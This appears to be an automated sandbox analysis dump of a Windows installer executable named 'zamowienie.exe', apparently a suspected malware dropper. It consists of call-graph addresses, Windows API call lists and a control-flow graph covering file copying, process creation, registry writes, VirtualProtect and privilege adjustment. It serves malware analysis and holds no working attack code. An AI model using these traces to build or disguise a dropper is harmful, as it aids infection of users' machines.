lstrcpynA 5147->5276 5287 4063be lstrcpynA 5148->5287 5149->5141 5149->5151 5154 40140b 2 API calls 5151->5154 5153 40391c 5156 403934 5153->5156 5288 4063be lstrcpynA 5153->5288 5154->5141 5155 4038b5 5277 4063be lstrcpynA 5155->5277 5160 403952 wsprintfA 5156->5160 5174 403980 5156->5174 5219 403bc7 5159->5219 5161 406451 21 API calls 5160->5161 5161->5156 5162 4059c8 2 API calls 5162->5174 5163 405a22 2 API calls 5163->5174 5164 403990 GetFileAttributesA 5167 40399c DeleteFileA 5164->5167 5164->5174 5165 4039c8 SetCurrentDirectoryA 5166 406197 40 API calls 5165->5166 5168 4039d7 CopyFileA 5166->5168 5167->5174 5168->5169 5168->5174 5278 403ad5 5169->5278 5170 405b80 71 API calls 5170->5174 5171 406197 40 API calls 5171->5174 5172 406451 21 API calls 5172->5174 5173 405a57 2 API calls 5173->5174 5174->5156 5174->5160 5174->5162 5174->5163 5174->5164 5174->5165 5174->5169 5174->5170 5174->5171 5174->5172 5174->5173 5175 403a31 CloseHandle 5174->5175 5176 406751 2 API calls 5174->5176 5175->5169 5176->5174 5177->5105 5178->5107 5180 4066b8 5 API calls 5179->5180 5182 4034cc 5180->5182 5181 4034d6 5181->5113 5182->5181 5183 405d50 3 API calls 5182->5183 5184 4034de 5183->5184 5185 405a22 2 API calls 5184->5185 5186 4034e4 5185->5186 5187 405f80 2 API calls 5186->5187 5188 4034ef 5187->5188 5188->5113 5289 405f51 GetFileAttributesA CreateFileA 5189->5289 5191 402fc4 5218 402fd1 5191->5218 5290 4063be lstrcpynA 5191->5290 5193 402fe7 5194 405d97 2 API calls 5193->5194 5195 402fed 5194->5195 5291 4063be lstrcpynA 5195->5291 5197 402ff8 GetFileSize 5198 40300f 5197->5198 5213 4030f2 5197->5213 5201 403493 ReadFile 5198->5201 5203 40318f 5198->5203 5210 402ee2 36 API calls 5198->5210 5198->5213 5198->5218 5199 402ee2 36 API calls 5200 4030fb 5199->5200 5202 403137 GlobalAlloc 5200->5202 5200->5218 5293 4034a9 SetFilePointer 5200->5293 5201->5198 5204 40314e 5202->5204 5206 402ee2 36 API calls 5203->5206 5209 405f80 2 API calls 5204->5209 5206->5218 5207 403118 5208 403493 ReadFile 5207->5208 5211 403123 5208->5211 5212 40315f CreateFileA 5209->5212 5210->5198 5211->5202 5211->5218 5214 403199 5212->5214 5212->5218 5213->5199 5292 4034a9 SetFilePointer 5214->5292 5216 4031a7 5217 403222 48 API calls 5216->5217 5217->5218 5218->5122 5220 4067e6 5 API calls 5219->5220 5221 403bdb 5220->5221 5222 403bf3 5221->5222 5225 403be1 5221->5225 5223 4062a5 3 API calls 5222->5223 5224 403c1e 5223->5224 5226 403c3c lstrcatA 5224->5226 5229 4062a5 3 API calls 5224->5229 5302 40631c wsprintfA 5225->5302 5228 403bf1 5226->5228 5294 403e8c 5228->5294 5229->5226 5232 405e3e 18 API calls 5233 403c6e 5232->5233 5234 403cf7 5233->5234 5237 4062a5 3 API calls 5233->5237 5235 405e3e 18 API calls 5234->5235 5236 403cfd 5235->5236 5238 403d0d LoadImageA 5236->5238 5240 406451 21 API calls 5236->5240 5239 403c9a 5237->5239 5241 403db3 5238->5241 5242 403d34 RegisterClassA 5238->5242 5239->5234 5243 403cb6 lstrlenA 5239->5243 5247 405d7b CharNextA 5239->5247 5240->5238 5246 40140b 2 API calls 5241->5246 5244 403dbd 5242->5244 5245 403d6a SystemParametersInfoA CreateWindowExA 5242->5245 5248 403cc4 lstrcmpiA 5243->5248 5249 403cea 5243->5249 5244->5169 5245->5241 5250 403db9 5246->5250 5251 403cb4 5247->5251 5248->5249 5252 403cd4 GetFileAttributesA 5248->5252 5253 405d50 3 API calls 5249->5253 5250->5244 5255 403e8c 22 API calls 5250->5255 5251->5243 5254 403ce0 5252->5254 5256 403cf0 5253->5256 5254->5249 5257 405d97 2 API calls 5254->5257 5258 403dca 5255->5258 5303 4063be lstrcpynA 5256->5303 5257->5249 5260 403dd6 ShowWindow 5258->5260 5261 403e59 5258->5261 5263 406778 3 API calls 5260->5263 5304 4055d4 OleInitialize 5261->5304 5265 403dee 5263->5265 5264 403e5f 5267 403e63 5264->5267 5268 403e7b 5264->5268 5266 403dfc GetClassInfoA 5265->5266 5269 406778 3 API calls 5265->5269 5271 403e10 GetClassInfoA RegisterClassA 5266->5271 5272 403e26 DialogBoxParamA 5266->5272 5267->5244 5274 40140b 2 API calls 5267->5274 5270 40140b 2 API calls 5268->5270 5269->5266 5270->5244 5271->5272 5273 40140b 2 API calls 5272->5273 5273->5244 5274->5244 5275->5111 5276->5155 5277->5159 5279 403af0 5278->5279 5280 403ae6 CloseHandle 5278->5280 5281 403b04 5279->5281 5282 403afa CloseHandle 5279->5282 5280->5279 5312 403b32 5281->5312 5282->5281 5285 405b80 71 API calls 5286 4038d8 OleUninitialize 5285->5286 5286->5131 5286->5132 5287->5153 5288->5156 5289->5191 5290->5193 5291->5197 5292->5216 5293->5207 5295 403ea0 5294->5295 5311 40631c wsprintfA 5295->5311 5297 403f11 5298 403f45 22 API calls 5297->5298 5300 403f16 5298->5300 5299 403c4c 5299->5232 5300->5299 5301 406451 21 API calls 5300->5301 5301->5300 5302->5228 5303->5234 5305 4044aa SendMessageA 5304->5305 5307 4055f7 5305->5307 5306 4044aa SendMessageA 5308 405630 OleUninitialize 5306->5308 5309 401389 2 API calls 5307->5309 5310 40561e 5307->5310 5308->5264 5309->5307 5310->5306 5311->5297 5313 403b40 5312->5313 5314 403b09 5313->5314 5315 403b45 FreeLibrary GlobalFree 5313->5315 5314->5285 5315->5314 5315->5315 5721 73402c73 5722 73402c8b 5721->5722 5723 734015c4 2 API calls 5722->5723 5724 73402ca6 5723->5724 5725 4014f4 SetForegroundWindow 5726 402aea 5725->5726 5330 405476 5331 405486 5330->5331 5332 40549a 5330->5332 5333 4054e3 5331->5333 5334 40548c 5331->5334 5335 4054a2 IsWindowVisible 5332->5335 5342 4054c2 5332->5342 5336 4054e8 CallWindowProcA 5333->5336 5337 4044aa SendMessageA 5334->5337 5335->5333 5338 4054af 5335->5338 5339 405496 5336->5339 5337->5339 5340 404db1 5 API calls 5338->5340 5341 4054b9 5340->5341 5341->5342 5342->5336 5343 404e31 4 API calls 5342->5343 5343->5333 5344 40177e 5345 402c5e 21 API calls 5344->5345 5346 401785 5345->5346 5347 4017a3 5346->5347 5348 4017ab 5346->5348 5384 4063be lstrcpynA 5347->5384 5385 4063be lstrcpynA 5348->5385 5351 4017a9 5355 4066b8 5 API calls 5351->5355 5352 4017b6 5353 405d50 3 API calls 5352->5353 5354 4017bc lstrcatA 5353->5354 5354->5351 5368 4017c8 5355->5368 5356 406751 2 API calls 5356->5368 5357 401809 5358 405f2c 2 API calls 5357->5358 5358->5368 5360 4017df CompareFileTime 5360->5368 5361 4018a3 5362 405502 28 API calls 5361->5362 5363 4018ad 5362->5363 5366 403222 48 API calls 5363->5366 5364 405502 28 API calls 5373 40188f 5364->5373 5365 4063be lstrcpynA 5365->5368 5367 4018c0 5366->5367 5369 4018d4 SetFileTime 5367->5369 5371 4018e6 CloseHandle 5367->5371 5368->5356 5368->5357 5368->5360 5368->5361 5368->5365 5370 406451 21 API calls 5368->5370 5378 405ad4 MessageBoxIndirectA 5368->5378 5382 40187a 5368->5382 5383 405f51 GetFileAttributesA CreateFileA 5368->5383 5369->5371 5370->5368 5372 4018f7 5371->5372 5371->5373 5374 4018fc 5372->5374 5375 40190f 5372->5375 5376 406451 21 API calls 5374->5376 5377 406451 21 API calls 5375->5377 5379 401904 lstrcatA 5376->5379 5380 401917 5377->5380 5378->5368 5379->5380 5380->5373 5381 405ad4 MessageBoxIndirectA 5380->5381 5381->5373 5382->5364 5382->5373 5383->5368 5384->5351 5385->5352 5734 40167e 5735 402c5e 21 API calls 5734->5735 5736 401684 5735->5736 5737 406751 2 API calls 5736->5737 5738 40168a 5737->5738 5739 40197e 5740 402c3c 21 API calls 5739->5740 5741 401985 5740->5741 5742 402c3c 21 API calls 5741->5742 5743 401992 5742->5743 5744 402c5e 21 API calls 5743->5744 5745 4019a9 lstrlenA 5744->5745 5747 4019b9 5745->5747 5746 4019f9 5747->5746 5751 4063be lstrcpynA 5747->5751 5749 4019e9 5749->5746 5750 4019ee lstrlenA 5749->5750 5750->5746 5751->5749 5752 401000 5753 401037 BeginPaint GetClientRect 5752->5753 5754 40100c DefWindowProcA 5752->5754 5756 4010f3 5753->5756 5759 401179 5754->5759 5757 401073 CreateBrushIndirect FillRect DeleteObject 5756->5757 5758 4010fc 5756->5758 5757->5756 5760 401102 CreateFontIndirectA 5758->5760 5761 401167 EndPaint 5758->5761 5760->5761 5762 401112 6 API calls 5760->5762 5761->5759 5762->5761 5763 401502 5764 401507 5763->5764 5765 40152d 5763->5765 5766 402c3c 21 API calls 5764->5766 5766->5765 5767 401a83 5768 402c3c 21 API calls 5767->5768 5769 401a8c 5768->5769 5770 402c3c 21 API calls 5769->5770 5771 401a33 5770->5771 5772 403b85 5773 403b90 5772->5773 5774 403b94 5773->5774 5775 403b97 GlobalAlloc 5773->5775 5775->5774 5776 401588 5777 402a67 5776->5777 5780 40631c wsprintfA 5777->5780 5779 402a6c 5780->5779 5781 401b88 5782 402c5e 21 API calls 5781->5782 5783 401b8f 5782->5783 5784 402c3c 21 API calls 5783->5784 5785 401b98 wsprintfA 5784->5785 5786 402aea 5785->5786 5787 401d8a 5788 401d90 5787->5788 5789 401d9d GetDlgItem 5787->5789 5790 402c3c 21 API calls 5788->5790 5791 401d97 5789->5791 5790->5791 5792 401dde GetClientRect LoadImageA SendMessageA 5791->5792 5793 402c5e 21 API calls 5791->5793 5795 401e3f 5792->5795 5797 401e4b 5792->5797 5793->5792 5796 401e44 DeleteObject 5795->5796 5795->5797 5796->5797 5798 40278b 5799 402791 5798->5799 5800 402799 FindClose 5799->5800 5801 402aea 5799->5801 5800->5801 5802 40240d 5803 402c5e 21 API calls 5802->5803 5804 40241e 5803->5804 5805 402c5e 21 API calls 5804->5805 5806 402427 5805->5806 5807 402c5e 21 API calls 5806->5807 5808 402431 GetPrivateProfileStringA 5807->5808 4499 40168f 4500 402c5e 21 API calls 4499->4500 4501 401696 4500->4501 4502 402c5e 21 API calls 4501->4502 4503 40169f 4502->4503 4504 402c5e 21 API calls 4503->4504 4505 4016a8 MoveFileA 4504->4505 4506 4016b4 4505->4506 4507 4016bb 4505->4507 4509 401423 28 API calls 4506->4509 4511 40230f 4507->4511 4513 406751 FindFirstFileA 4507->4513 4509->4511 4514 406767 FindClose 4513->4514 4515 4016ca 4513->4515 4514->4515 4515->4511 4516 406197 MoveFileExA 4515->4516 4517 4061b8 4516->4517 4518 4061ab 4516->4518 4517->4506 4520 406027 4518->4520 4521 406073 GetShortPathNameA 4520->4521 4522 40604d 4520->4522 4524 406192 4521->4524 4525 406088 4521->4525 4547 405f51 GetFileAttributesA CreateFileA 4522->4547 4524->4517 4525->4524 4527 406090 wsprintfA 4525->4527 4526 406057 CloseHandle GetShortPathNameA 4526->4524 4528 40606b 4526->4528 4529 406451 21 API calls 4527->4529 4528->4521 4528->4524 4530 4060b8 4529->4530 4548 405f51 GetFileAttributesA CreateFileA 4530->4548 4532 4060c5 4532->4524 4533 4060d4 GetFileSize GlobalAlloc 4532->4533 4534 4060f6 4533->4534 4535 40618b CloseHandle 4533->4535 4549 405fc9 ReadFile 4534->4549 4535->4524 4540 406115 lstrcpyA 4542 406137 4540->4542 4541 406129 4543 405eb6 4 API calls 4541->4543 4544 40616e SetFilePointer 4542->4544 4543->4542 4556 405ff8 WriteFile 4544->4556 4547->4526 4548->4532 4550 405fe7 4549->4550 4550->4535 4551 405eb6 lstrlenA 4550->4551 4552 405ef7 lstrlenA 4551->4552 4553 405ed0 lstrcmpiA 4552->4553 4554 405eff 4552->4554 4553->4554 4555 405eee CharNextA 4553->4555 4554->4540 4554->4541 4555->4552 4557 406016 GlobalFree 4556->4557 4557->4535 5823 401490 5824 405502 28 API calls 5823->5824 5825 401497 5824->5825 5826 401a12 5827 402c5e 21 API calls 5826->5827 5828 401a19 5827->5828 5829 402c5e 21 API calls 5828->5829 5830 401a22 5829->5830 5831 401a29 lstrcmpiA 5830->5831 5832 401a3b lstrcmpA 5830->5832 5833 401a2f 5831->5833 5832->5833 5834 404594 lstrcpynA lstrlenA 5835 401594 5836 4015a4 ShowWindow 5835->5836 5837 4015ab 5835->5837 5836->5837 5838 4015b9 ShowWindow 5837->5838 5839 402aea 5837->5839 5838->5839 4679 402198 4680 402c5e 21 API calls 4679->4680 4681 40219f 4680->4681 4682 402c5e 21 API calls 4681->4682 4683 4021a9 4682->4683 4684 402c5e 21 API calls 4683->4684 4685 4021b3 4684->4685 4686 402c5e 21 API calls 4685->4686 4687 4021c0 4686->4687 4688 402c5e 21 API calls 4687->4688 4689 4021ca 4688->4689 4690 40220c CoCreateInstance 4689->4690 4691 402c5e 21 API calls 4689->4691 4694 40222b 4690->4694 4696 4022d9 4690->4696 4691->4690 4692 401423 28 API calls 4693 40230f 4692->4693 4695 4022b9 MultiByteToWideChar 4694->4695 4694->4696 4695->4696 4696->4692 4696->4693 5847 402318 5848 402c5e 21 API calls 5847->5848 5849 40231e 5848->5849 5850 402c5e 21 API calls 5849->5850 5851 402327 5850->5851 5852 402c5e 21 API calls 5851->5852 5853 402330 5852->5853 5854 406751 2 API calls 5853->5854 5855 402339 5854->5855 5856 40234a lstrlenA lstrlenA 5855->5856 5857 40233d 5855->5857 5859 405502 28 API calls 5856->5859 5858 405502 28 API calls 5857->5858 5861 402345 5857->5861 5858->5861 5860 402386 SHFileOperationA 5859->5860 5860->5857 5860->5861 4697 40269a 4698 402c3c 21 API calls 4697->4698 4701 4026a4 4698->4701 4699 402712 4700 405fc9 ReadFile 4700->4701 4701->4699 4701->4700 4702 402714 4701->4702 4703 402724 4701->4703 4706 40631c wsprintfA 4702->4706 4703->4699 4705 40273a SetFilePointer 4703->4705 4705->4699 4706->4699 4707 405a9a ShellExecuteExA 5862 40239a 5863 4023a1 5862->5863 5866 4023b4 5862->5866 5864 406451 21 API calls 5863->5864 5865 4023ae 5864->5865 5865->5866 5867 405ad4 MessageBoxIndirectA 5865->5867 5867->5866 5868 402a1b 5869 402a22 5868->5869 5870 402a6e 5868->5870 5873 402c3c 21 API calls 5869->5873 5876 402a6c 5869->5876 5871 4067e6 5 API calls 5870->5871 5872 402a75 5871->5872 5874 402c5e 21 API calls 5872->5874 5875 402a30 5873->5875 5877 402a7e 5874->5877 5878 402c3c 21 API calls 5875->5878 5877->5876 5886 406411 5877->5886 5879 402a3f 5878->5879 5885 40631c wsprintfA 5879->5885 5881 402a8c 5881->5876 5890 4063fb 5881->5890 5885->5876 5887 40641c 5886->5887 5888 40643f IIDFromString 5887->5888 5889 406438 5887->5889 5888->5881 5889->5881 5893 4063e0 WideCharToMultiByte 5890->5893 5892 402aad CoTaskMemFree 5892->5876 5893->5892 5894 40149d 5895 4023b4 5894->5895 5896 4014ab PostQuitMessage 5894->5896 5896->5895 5897 401f1e 5898 402c5e 21 API calls 5897->5898 5899 401f24 5898->5899 5900 402c5e 21 API calls 5899->5900 5901 401f2d 5900->5901 5902 402c5e 21 API calls 5901->5902 5903 401f36 5902->5903 5904 402c5e 21 API calls 5903->5904 5905 401f3f 5904->5905 5906 401423 28 API calls 5905->5906 5907 401f46 5906->5907 5914 405a9a ShellExecuteExA 5907->5914 5909 401f81 5910 40685b 5 API calls 5909->5910 5912 4027ed 5909->5912 5911 401f9b CloseHandle 5910->5911 5911->5912 5914->5909 4737 401fa0 4738 402c5e 21 API calls 4737->4738 4739 401fa6 4738->4739 4740 405502 28 API calls 4739->4740 4741 401fb0 4740->4741 4752 405a57 CreateProcessA 4741->4752 4744 401fd7 CloseHandle 4748 4027ed 4744->4748 4747 401fcb 4749 401fd0 4747->4749 4750 401fd9 4747->4750 4760 40631c wsprintfA 4749->4760 4750->4744 4753 401fb6 4752->4753 4754 405a8a CloseHandle 4752->4754 4753->4744 4753->4748 4755 40685b WaitForSingleObject 4753->4755 4754->4753 4756 406875 4755->4756 4757 406887 GetExitCodeProcess 4756->4757 4761 406822 4756->4761 4757->4747 4760->4744 4762 40683f PeekMessageA 4761->4762 4763 406835 DispatchMessageA 4762->4763 4764 40684f WaitForSingleObject 4762->4764 4763->4762 4764->4756 5915 402020 5916 402c5e 21 API calls 5915->5916 5917 402027 5916->5917 5918 4067e6 5 API calls 5917->5918 5919 402036 5918->5919 5920 40204e GlobalAlloc 5919->5920 5921 4020be 5919->5921 5920->5921 5922 402062 5920->5922 5923 4067e6 5 API calls 5922->5923 5924 402069 5923->5924 5925 4067e6 5 API calls 5924->5925 5926 402073 5925->5926 5926->5921 5930 40631c wsprintfA 5926->5930 5928 4020ae 5931 40631c wsprintfA 5928->5931 5930->5928 5931->5921 5932 401922 5933 401959 5932->5933 5934 402c5e 21 API calls 5933->5934 5935 40195e 5934->5935 5936 405b80 71 API calls 5935->5936 5937 401967 5936->5937 4875 4024a3 4876 402c5e 21 API calls 4875->4876 4877 4024b5 4876->4877 4878 402c5e 21 API calls 4877->4878 4879 4024bf 4878->4879 4892 402cee 4879->4892 4881 402aea 4882 4024f4 4885 402500 4882->4885 4887 402c3c 21 API calls 4882->4887 4884 402c5e 21 API calls 4886 4024ed lstrlenA 4884->4886 4888 402522 RegSetValueExA 4885->4888 4896 403222 4885->4896 4886->4882 4887->4885 4889 402538 RegCloseKey 4888->4889 4889->4881 4893 402d09 4892->4893 4911 406272 4893->4911 4897 403231 SetFilePointer 4896->4897 4898 40324d 4896->4898 4897->4898 4915 40332a GetTickCount 4898->4915 4901 4032ea 4901->4888 4902 405fc9 ReadFile 4903 40326d 4902->4903 4903->4901 4904 40332a 46 API calls 4903->4904 4905 403284 4904->4905 4905->4901 4906 4032f0 ReadFile 4905->4906 4908 403293 4905->4908 4906->4901 4908->4901 4909 405fc9 ReadFile 4908->4909 4910 405ff8 WriteFile 4908->4910 4909->4908 4910->4908 4912 406281 4911->4912 4913 4024cf 4912->4913 4914 40628c RegCreateKeyExA 4912->4914 4913->4881 4913->4882 4913->4884 4914->4913 4916 403482 4915->4916 4917 403358 4915->4917 4918 402ee2 36 API calls 4916->4918 4928 4034a9 SetFilePointer 4917->4928 4925 403254 4918->4925 4920 403363 SetFilePointer 4922 403388 4920->4922 4922->4925 4926 405ff8 WriteFile 4922->4926 4927 403463 SetFilePointer 4922->4927 4929 403493 4922->4929 4932 40692b 4922->4932 4939 402ee2 4922->4939 4925->4901 4925->4902 4926->4922 4927->4916 4928->4920 4930 405fc9 ReadFile 4929->4930 4931 4034a6 4930->4931 4931->4922 4933 406950 4932->4933 4934 406958 4932->4934 4933->4922 4934->4933 4935 4069e8 GlobalAlloc 4934->4935 4936 4069df GlobalFree 4934->4936 4937 406a56 GlobalFree 4934->4937 4938 406a5f GlobalAlloc 4934->4938 4935->4933 4935->4934 4936->4935 4937->4938 4938->4933 4938->4934 4940 402ef0 4939->4940 4941 402f08 4939->4941 4942 402f00 4940->4942 4943 402ef9 DestroyWindow 4940->4943 4944 402f10 4941->4944 4945 402f18 GetTickCount 4941->4945 4942->4922 4943->4942 4947 406822 2 API calls 4944->4947 4945->4942 4946 402f26 4945->4946 4948 402f5b CreateDialogParamA ShowWindow 4946->4948 4949 402f2e 4946->4949 4947->4942 4948->4942 4949->4942 4954 402ec6 4949->4954 4951 402f3c wsprintfA 4952 405502 28 API calls 4951->4952 4953 402f59 4952->4953 4953->4942 4955 402ed5 4954->4955 4956 402ed7 MulDiv 4954->4956 4955->4956 4956->4951 5938 401d23 5939 402c3c 21 API calls 5938->5939 5940 401d29 IsWindow 5939->5940 5941 401a33 5940->5941 5942 401925 5943 402c5e 21 API calls 5942->5943 5944 40192c 5943->5944 5945 405ad4 MessageBoxIndirectA 5944->5945 5946 401935 5945->5946 5947 4027a5 5948 4027ab 5947->5948 5949 4027af FindNextFileA 5948->5949 5951 4027c1 5948->5951 5950 402800 5949->5950 5949->5951 5953 4063be lstrcpynA 5950->5953 5953->5951 5954 406e26 5956 40695e 5954->5956 5955 4072c9 5956->5955 5956->5956 5957 4069e8 GlobalAlloc 5956->5957 5958 4069df GlobalFree 5956->5958 5959 406a56 GlobalFree 5956->5959 5960 406a5f GlobalAlloc 5956->5960 5957->5955 5957->5956 5958->5957 5959->5960 5960->5955 5960->5956 5961 4048a9 5962 4048b9 5961->5962 5963 4048df 5961->5963 5965 40445e 22 API calls 5962->5965 5964 4044c5 8 API calls 5963->5964 5966 4048eb 5964->5966 5967 4048c6 SetDlgItemTextA 5965->5967 5967->5963 5061 401bac 5062 401bb9 5061->5062 5063 401bfd 5061->5063 5064 401c41 5062->5064 5069 401bd0 5062->5069 5065 401c01 5063->5065 5066 401c26 GlobalAlloc 5063->5066 5067 406451 21 API calls 5064->5067 5074 4023b4 5064->5074 5065->5074 5080 4063be lstrcpynA 5065->5080 5068 406451 21 API calls 5066->5068 5070 4023ae 5067->5070 5068->5064 5081 4063be lstrcpynA 5069->5081 5070->5074 5083 405ad4 5070->5083 5073 401c13 GlobalFree 5073->5074 5076 401bdf 5082 4063be lstrcpynA 5076->5082 5078 401bee 5087 4063be lstrcpynA 5078->5087 5080->5073 5081->5076 5082->5078 5084 405ae9 5083->5084 5085 405b35 5084->5085 5086 405afd MessageBoxIndirectA 5084->5086 5085->5074 5086->5085 5087->5074 5968 4029af 5969 402c3c 21 API calls 5968->5969 5971 4029b5 5969->5971 5970 406451 21 API calls 5972 4027ed 5970->5972 5971->5970 5971->5972 5316 734029b1 5317 73402a01 5316->5317 5318 734029c1 VirtualProtect 5316->5318 5318->5317 5973 402631 5974 402c5e 21 API calls 5973->5974 5975 402638 5974->5975 5978 405f51 GetFileAttributesA CreateFileA 5975->5978 5977 402644 5978->5977 5319 4025b5 5320 402c9e 21 API calls 5319->5320 5321 4025bf 5320->5321 5322 402c3c 21 API calls 5321->5322 5323 4025c8 5322->5323 5324 4025e3 RegEnumKeyA 5323->5324 5325 4025ef RegEnumValueA 5323->5325 5328 4027ed 5323->5328 5326 40260b RegCloseKey 5324->5326 5325->5326 5327 402604 5325->5327 5326->5328 5327->5326 5979 4014b7 5980 4014bd 5979->5980 5981 401389 2 API calls 5980->5981 5982 4014c5 5981->5982 5983 40283b 6005 405f51 GetFileAttributesA CreateFileA 5983->6005 5985 402842 5986 4028fe 5985->5986 5989 4028e6 5985->5989 5990 40285d GlobalAlloc 5985->5990 5987 402905 DeleteFileA 5986->5987 5988 402918 5986->5988 5987->5988 5992 403222 48 API calls 5989->5992 5990->5989 5991 402876 5990->5991 6006 4034a9 SetFilePointer 5991->6006 5993 4028f3 CloseHandle 5992->5993 5993->5986 5995 40287c 5996 403493 ReadFile 5995->5996 5997 402885 GlobalAlloc 5996->5997 5998 402895 5997->5998 5999 4028cf 5997->5999 6000 403222 48 API calls 5998->6000 6001 405ff8 WriteFile 5999->6001 6002 4028a2 6000->6002 6003 4028db GlobalFree 6001->6003 6004 4028c6 GlobalFree 6002->6004 6003->5989 6004->5999 6005->5985 6006->5995 6007 7340103d 6010 7340101b 6007->6010 6011 7340154b GlobalFree 6010->6011 6012 73401020 6011->6012 6013 73401024 6012->6013 6014 73401027 GlobalAlloc 6012->6014 6015 73401572 3 API calls 6013->6015 6014->6013 6016 7340103b 6015->6016

                                                                                                                                              Executed Functions

                                                                                                                                              Function 004034F1 Relevance: 93.2, APIs: 32, Strings: 21, Instructions: 430stringfilecomCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 4034f1-403541 SetErrorMode GetVersionExA 1 403582 0->1 2 403543-40355d GetVersionExA 0->2 3 403589 1->3 2->3 4 40355f-40357e 2->4 5 40358b-403596 3->5 6 4035ad-4035b4 3->6 4->1 7 403598-4035a7 5->7 8 4035a9 5->8 9 4035b6 6->9 10 4035be-4035fe 6->10 7->6 8->6 9->10 11 403600-403608 call 4067e6 10->11 12 403611 10->12 11->12 17 40360a 11->17 13 403616-40362a call 406778 lstrlenA 12->13 19 40362c-403648 call 4067e6 * 3 13->19 17->12 26 403659-4036b9 #17 OleInitialize SHGetFileInfoA call 4063be GetCommandLineA call 4063be 19->26 27 40364a-403650 19->27 34 4036c4-4036d7 call 405d7b CharNextA 26->34 35 4036bb-4036bf 26->35 27->26 31 403652 27->31 31->26 38 403798-40379c 34->38 35->34 39 4037a2 38->39 40 4036dc-4036df 38->40 43 4037b6-4037d0 GetTempPathA call 4034c0 39->43 41 4036e1-4036e5 40->41 42 4036e7-4036ee 40->42 41->41 41->42 45 4036f0-4036f1 42->45 46 4036f5-4036f8 42->46 52 4037d2-4037f0 GetWindowsDirectoryA lstrcatA call 4034c0 43->52 53 403828-403840 DeleteFileA call 402f81 43->53 45->46 47 403789-403795 call 405d7b 46->47 48 4036fe-403702 46->48 47->38 67 403797 47->67 50 403704-40370a 48->50 51 40371a-403747 48->51 55 403710 50->55 56 40370c-40370e 50->56 57 403759-403787 51->57 58 403749-40374f 51->58 52->53 69 4037f2-403822 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4034c0 52->69 70 4038d3-4038e4 call 403ad5 OleUninitialize 53->70 71 403846-40384c 53->71 55->51 56->51 56->55 57->47 65 4037a4-4037b1 call 4063be 57->65 62 403751-403753 58->62 63 403755 58->63 62->57 62->63 63->57 65->43 67->38 69->53 69->70 81 403a41-403a47 70->81 82 4038ea-4038f9 call 405ad4 ExitProcess 70->82 74 4038c4-4038cb call 403bc7 71->74 75 40384e-403859 call 405d7b 71->75 83 4038d0 74->83 86 40385b-403884 75->86 87 40388f-403898 75->87 84 403a49-403a5e GetCurrentProcess OpenProcessToken 81->84 85 403abf-403ac7 81->85 83->70 89 403a60-403a89 LookupPrivilegeValueA AdjustTokenPrivileges 84->89 90 403a8f-403a9d call 4067e6 84->90 95 403ac9 85->95 96 403acc-403acf ExitProcess 85->96 91 403886-403888 86->91 92 40389a-4038a8 call 405e3e 87->92 93 4038ff-403923 call 405a3f lstrlenA call 4063be 87->93 89->90 104 403aab-403ab6 ExitWindowsEx 90->104 105 403a9f-403aa9 90->105 91->87 98 40388a-40388d 91->98 92->70 106 4038aa-4038c0 call 4063be * 2 92->106 114 403934-403949 93->114 115 403925-40392f call 4063be 93->115 95->96 98->87 98->91 104->85 108 403ab8-403aba call 40140b 104->108 105->104 105->108 106->74 108->85 118 40394e 114->118 115->114 120 403952-40397e wsprintfA call 406451 118->120 123 403980-403985 call 4059c8 120->123 124 403987 call 405a22 120->124 128 40398c-40398e 123->128 124->128 129 403990-40399a GetFileAttributesA 128->129 130 4039c8-4039e7 SetCurrentDirectoryA call 406197 CopyFileA 128->130 132 4039b9-4039c1 129->132 133 40399c-4039a5 DeleteFileA 129->133 130->70 137 4039ed-403a0e call 406197 call 406451 call 405a57 130->137 132->118 136 4039c3 132->136 133->132 135 4039a7-4039b7 call 405b80 133->135 135->120 135->132 136->70 146 403a10-403a18 137->146 147 403a31-403a3c CloseHandle 137->147 146->70 148 403a1e-403a26 call 406751 146->148 147->70 148->120 151 403a2c 148->151 151->70
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403514
                                                                                                                                              • GetVersionExA.KERNEL32(?), ref: 0040353D
                                                                                                                                              • GetVersionExA.KERNEL32(0000009C), ref: 00403554
                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040361D
                                                                                                                                              • #17.COMCTL32(?,?,0000000A,?), ref: 0040365A
                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403661
                                                                                                                                              • SHGetFileInfoA.SHELL32(0041F910,00000000,?,?,00000000,?,?,0000000A,?), ref: 0040367F
                                                                                                                                              • GetCommandLineA.KERNEL32(Noncomplacency,NSIS Error,?,?,0000000A,?), ref: 00403694
                                                                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\zamowienie.exe",00000020,"C:\Users\user\Desktop\zamowienie.exe",00000000,?,?,0000000A,?), ref: 004036CE
                                                                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,?,0000000A,?), ref: 004037C7
                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,?,0000000A,?), ref: 004037D8
                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?), ref: 004037E4
                                                                                                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?), ref: 004037F8
                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?), ref: 00403800
                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?), ref: 00403811
                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,?,0000000A,?), ref: 00403819
                                                                                                                                              • DeleteFileA.KERNELBASE(1033,?,?,0000000A,?), ref: 0040382D
                                                                                                                                              • OleUninitialize.OLE32(?,?,?,0000000A,?), ref: 004038D8
                                                                                                                                              • ExitProcess.KERNEL32 ref: 004038F9
                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",00000000,?,?,?,0000000A,?), ref: 00403908
                                                                                                                                              • wsprintfA.USER32 ref: 0040395F
